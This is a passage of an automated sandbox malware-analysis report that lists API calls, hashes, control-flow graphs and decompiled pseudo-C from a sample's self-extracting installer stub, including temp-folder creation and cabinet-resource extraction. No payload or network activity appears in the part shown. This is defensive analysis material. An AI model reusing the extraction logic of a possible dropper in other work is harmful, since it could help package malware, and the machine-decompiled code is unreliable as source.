                                                                        • LocalFree.KERNEL32(00000000), ref: 00F8564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85620
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F856B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F8571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F85737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F857CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F857EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F85802
                                                                          • Part of subcall function 00F82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F82654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F85830
                                                                          • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                          • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                          • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                          • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F85878
                                                                          • Part of subcall function 00F8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                          • Part of subcall function 00F8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-3110009808
                                                                        • Opcode ID: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                        • Instruction ID: e9d0b85950076327f5867745168dc9044b6e566591497be0af7a2b04e7a98adc
                                                                        • Opcode Fuzzy Hash: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                        • Instruction Fuzzy Hash: 95814C71E04A099BEB20BB708C85BFE72AD9F50B50F4401A6F586D6191EF78CDC6BB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 f8597d-f859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 f859bb-f859d8 call f844b9 call f86285 324->325 326 f859dd-f85a1b GetDiskFreeSpaceA 324->326 343 f85c05-f85c14 call f86ce0 325->343 328 f85ba1-f85bde memset call f86285 GetLastError FormatMessageA 326->328 329 f85a21-f85a4a MulDiv 326->329 339 f85be3-f85bfc call f844b9 SetCurrentDirectoryA 328->339 329->328 332 f85a50-f85a6c GetVolumeInformationA 329->332 335 f85a6e-f85ab0 memset call f86285 GetLastError FormatMessageA 332->335 336 f85ab5-f85aca SetCurrentDirectoryA 332->336 335->339 337 f85acc-f85ad1 336->337 341 f85ae2-f85ae4 337->341 342 f85ad3-f85ad8 337->342 351 f85c02 339->351 348 f85ae6 341->348 349 f85ae7-f85af8 341->349 342->341 346 f85ada-f85ae0 342->346 346->337 346->341 348->349 353 f85af9-f85afb 349->353 354 f85c04 351->354 355 f85afd-f85b03 353->355 356 f85b05-f85b08 353->356 354->343 355->353 355->356 357 f85b0a-f85b1b call f844b9 356->357 358 f85b20-f85b27 356->358 357->351 360 f85b29-f85b33 358->360 361 f85b52-f85b5b 358->361 360->361 364 f85b35-f85b50 360->364 362 f85b62-f85b6d 361->362 365 f85b6f-f85b74 362->365 366 f85b76-f85b7d 362->366 364->362 367 f85b85 365->367 368 f85b7f-f85b81 366->368 369 f85b83 366->369 370 f85b96-f85b9f 367->370 371 f85b87-f85b94 call f8268b 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E00F8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0xf89124 = E00F86285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E00F844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
                                                                        							__eflags = _t101;
                                                                        						}
                                                                        						 *_t101 = 0;
                                                                        						_t112 = 0x200;
                                                                        						_t102 = _v812;
                                                                        						_t78 = 0;
                                                                        						_t118 = 8;
                                                                        						while(1) {
                                                                        							__eflags = _t102 - _t112;
                                                                        							if(_t102 == _t112) {
                                                                        								break;
                                                                        							}
                                                                        							_t112 = _t112 + _t112;
                                                                        							_t78 = _t78 + 1;
                                                                        							__eflags = _t78 - _t118;
                                                                        							if(_t78 < _t118) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t78 - _t118;
                                                                        						if(_t78 != _t118) {
                                                                        							__eflags =  *0xf89a34 & 0x00000008;
                                                                        							if(( *0xf89a34 & 0x00000008) == 0) {
                                                                        								L20:
                                                                        								_t103 =  *0xf89a38; // 0x0
                                                                        								_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                        								L21:
                                                                        								__eflags = (_v804 & 0x00000003) - 3;
                                                                        								if((_v804 & 0x00000003) != 3) {
                                                                        									__eflags = _v804 & 0x00000001;
                                                                        									if((_v804 & 0x00000001) == 0) {
                                                                        										__eflags = _t103 - _t116;
                                                                        									} else {
                                                                        										__eflags = _t110 - _t116;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t103 + _t110 - _t116;
                                                                        								}
                                                                        								if(__eflags <= 0) {
                                                                        									 *0xf89124 = 0;
                                                                        									_t66 = 1;
                                                                        								} else {
                                                                        									_t66 = E00F8268B(_a4, _t110, _t103,  &_v16);
                                                                        								}
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _v816 & 0x00008000;
                                                                        							if((_v816 & 0x00008000) == 0) {
                                                                        								goto L20;
                                                                        							}
                                                                        							_t105 =  *0xf89a38; // 0x0
                                                                        							_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                        							_t103 = (_t105 >> 2) +  *0xf89a38;
                                                                        							goto L21;
                                                                        						}
                                                                        						_t110 = 0x4c5;
                                                                        						E00F844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                        						goto L31;
                                                                        					}
                                                                        					memset( &_v788, 0, 0x200);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        					_t110 = 0x4f9;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t110 = 0x4bc;
                                                                        					E00F844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t66 = 0;
                                                                        					L33:
                                                                        					return E00F86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                        				}
                                                                        			}



































                                                                        0x00f8597d
                                                                        0x00f85988
                                                                        0x00f8598f
                                                                        0x00f8599a
                                                                        0x00f859a6
                                                                        0x00f859a8
                                                                        0x00f859af
                                                                        0x00f859b9
                                                                        0x00f859dd
                                                                        0x00f859e4
                                                                        0x00f859f1
                                                                        0x00f859fe
                                                                        0x00f85a0b
                                                                        0x00f85a13
                                                                        0x00f85a19
                                                                        0x00f85a1b
                                                                        0x00f85ba1
                                                                        0x00f85baf
                                                                        0x00f85bbd
                                                                        0x00f85bd8
                                                                        0x00f85bde
                                                                        0x00f85be3
                                                                        0x00f85bec
                                                                        0x00f85bf0
                                                                        0x00f85bfc
                                                                        0x00f85c02
                                                                        0x00f85c02
                                                                        0x00f85c02
                                                                        0x00f85c04
                                                                        0x00f85c04
                                                                        0x00000000
                                                                        0x00f85c04
                                                                        0x00f85a27
                                                                        0x00f85a3a
                                                                        0x00f85a46
                                                                        0x00f85a48
                                                                        0x00f85a4a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85a64
                                                                        0x00f85a6a
                                                                        0x00f85a6c
                                                                        0x00f85abc
                                                                        0x00f85ac2
                                                                        0x00f85ac9
                                                                        0x00f85aca
                                                                        0x00f85aca
                                                                        0x00f85acc
                                                                        0x00f85acc
                                                                        0x00f85acf
                                                                        0x00f85ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85ad3
                                                                        0x00f85ad6
                                                                        0x00f85ad8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85ada
                                                                        0x00f85adc
                                                                        0x00f85add
                                                                        0x00f85add
                                                                        0x00f85ae0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85ae0
                                                                        0x00f85ae2
                                                                        0x00f85ae4
                                                                        0x00f85ae6
                                                                        0x00f85ae6
                                                                        0x00f85ae6
                                                                        0x00f85ae9
                                                                        0x00f85aeb
                                                                        0x00f85af0
                                                                        0x00f85af6
                                                                        0x00f85af8
                                                                        0x00f85af9
                                                                        0x00f85af9
                                                                        0x00f85afb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85afd
                                                                        0x00f85aff
                                                                        0x00f85b00
                                                                        0x00f85b03
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85b03
                                                                        0x00f85b05
                                                                        0x00f85b08
                                                                        0x00f85b20
                                                                        0x00f85b27
                                                                        0x00f85b52
                                                                        0x00f85b52
                                                                        0x00f85b5b
                                                                        0x00f85b62
                                                                        0x00f85b6b
                                                                        0x00f85b6d
                                                                        0x00f85b76
                                                                        0x00f85b7d
                                                                        0x00f85b83
                                                                        0x00f85b7f
                                                                        0x00f85b7f
                                                                        0x00f85b7f
                                                                        0x00f85b6f
                                                                        0x00f85b72
                                                                        0x00f85b72
                                                                        0x00f85b85
                                                                        0x00f85b98
                                                                        0x00f85b9e
                                                                        0x00f85b87
                                                                        0x00f85b8f
                                                                        0x00f85b8f
                                                                        0x00000000
                                                                        0x00f85b85
                                                                        0x00f85b29
                                                                        0x00f85b33
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85b35
                                                                        0x00f85b48
                                                                        0x00f85b4a
                                                                        0x00000000
                                                                        0x00f85b4a
                                                                        0x00f85b0f
                                                                        0x00f85b16
                                                                        0x00000000
                                                                        0x00f85b16
                                                                        0x00f85a7c
                                                                        0x00f85a8a
                                                                        0x00f85aa5
                                                                        0x00f85aab
                                                                        0x00000000
                                                                        0x00f859bb
                                                                        0x00f859c0
                                                                        0x00f859c7
                                                                        0x00f859d1
                                                                        0x00f859d6
                                                                        0x00f85c05
                                                                        0x00f85c14
                                                                        0x00f85c14

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F85A13
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00F85A40
                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F85A64
                                                                        • memset.MSVCRT ref: 00F85A7C
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F85A98
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F85AA5
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F85BFC
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                        • String ID:
                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                        • Instruction ID: ce33b91b0c74f9c25942b46efbaf9f788e2146554266ef4d571621944daf9692
                                                                        • Opcode Fuzzy Hash: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                        • Instruction Fuzzy Hash: 8D71A2B1A0061CAFEB15EB64CCC5BFA77ACEB48750F5440AAF505D6140DA749E85AF20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 f84fe0-f8501a call f8468f FindResourceA LoadResource LockResource 377 f85020-f85027 374->377 378 f85161-f85163 374->378 379 f85029-f85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 f85057-f8505e call f84efd 377->380 379->380 383 f8507c-f850b4 380->383 384 f85060-f85077 call f844b9 380->384 388 f850e8-f85104 call f844b9 383->388 389 f850b6-f850da 383->389 390 f85107-f8510e 384->390 402 f85106 388->402 401 f850dc 389->401 389->402 392 f8511d-f8511f 390->392 393 f85110-f85117 FreeResource 390->393 396 f8513a-f85141 392->396 397 f85121-f85127 392->397 393->392 399 f8515f 396->399 400 f85143-f8514a 396->400 397->396 398 f85129-f85135 call f844b9 397->398 398->396 399->378 400->399 404 f8514c-f85159 SendMessageA 400->404 405 f850e3-f850e6 401->405 402->390 404->399 405->388 405->402
                                                                        C-Code - Quality: 77%
                                                                        			E00F84FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0xf89144 = E00F8468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0xf89140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0xf88584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0xf88584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E00F84EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E00F84CA0, E00F84CC0, E00F84980, E00F84A50, E00F84AD0, E00F84B60, E00F84BC0, 1, 0xf89148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0xf89148; // 0x0
                                                                        						_t24 =  *0xf88584; // 0x0
                                                                        						E00F844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0xf81140, 0, E00F84CD0, 0, 0xf89140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0xf88584; // 0x0
                                                                        					E00F844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0xf89140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0xf89140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0xf891d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E00F844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0xf88a38 & 0x00000001) == 0 && ( *0xf89a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0xf88584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}
















                                                                        0x00f84fe0
                                                                        0x00f84fe6
                                                                        0x00f84ff9
                                                                        0x00f8500d
                                                                        0x00f85013
                                                                        0x00f8501a
                                                                        0x00f85163
                                                                        0x00f85163
                                                                        0x00f85020
                                                                        0x00f85027
                                                                        0x00f85037
                                                                        0x00f85051
                                                                        0x00f85051
                                                                        0x00f85057
                                                                        0x00f8505e
                                                                        0x00f850a7
                                                                        0x00f850ad
                                                                        0x00f850b4
                                                                        0x00f850e8
                                                                        0x00f850e8
                                                                        0x00f850ee
                                                                        0x00f850ff
                                                                        0x00f85104
                                                                        0x00f85106
                                                                        0x00000000
                                                                        0x00f85106
                                                                        0x00f850cd
                                                                        0x00f850d3
                                                                        0x00f850da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f850dd
                                                                        0x00f850e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85060
                                                                        0x00f85060
                                                                        0x00f85070
                                                                        0x00f85075
                                                                        0x00f85107
                                                                        0x00f85107
                                                                        0x00f8510e
                                                                        0x00f85111
                                                                        0x00f85117
                                                                        0x00f85117
                                                                        0x00f8511f
                                                                        0x00f85121
                                                                        0x00f85127
                                                                        0x00f85135
                                                                        0x00f85135
                                                                        0x00f85127
                                                                        0x00f85141
                                                                        0x00f85159
                                                                        0x00f85159
                                                                        0x00000000
                                                                        0x00f8515f

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F84FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00F85006
                                                                        • LockResource.KERNEL32(00000000), ref: 00F8500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00F85030
                                                                        • ShowWindow.USER32(00000000), ref: 00F85037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00F8504A
                                                                        • ShowWindow.USER32(00000000), ref: 00F85051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F85111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F85159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                        • Instruction ID: 919f73e338f55c4df8eaa356bf5c72729e50ca02cf3ea1352f7d2d173871e4e0
                                                                        • Opcode Fuzzy Hash: 9fd27aa6d8d8b7886dafaa694a9eb78d1e5de37c86c2a8ad19fbd96555bd9e79
                                                                        • Instruction Fuzzy Hash: 4331B870B44B0A7BE7207B61AD8DFF7365DE744FA5F080015F902A62A1DAB9DC01B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E00F853A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E00F8171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E00F81680(_t32, 0x104, _t20);
                                                                        					E00F8658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E00F86CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0xf88a20 = 1;
                                                                        				goto L5;
                                                                        			}

















                                                                        0x00f853ac
                                                                        0x00f853b3
                                                                        0x00f853b9
                                                                        0x00f853bb
                                                                        0x00f853bd
                                                                        0x00f853bf
                                                                        0x00f853d1
                                                                        0x00f853d6
                                                                        0x00f853e0
                                                                        0x00f853e2
                                                                        0x00f853f5
                                                                        0x00f853fb
                                                                        0x00f85402
                                                                        0x00f8540b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85413
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85415
                                                                        0x00f85416
                                                                        0x00f85427
                                                                        0x00f8542a
                                                                        0x00f8542b
                                                                        0x00f85434
                                                                        0x00f85434
                                                                        0x00f8543a
                                                                        0x00f8544c
                                                                        0x00f8544c
                                                                        0x00f85452
                                                                        0x00f8545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8545e
                                                                        0x00f8545f
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
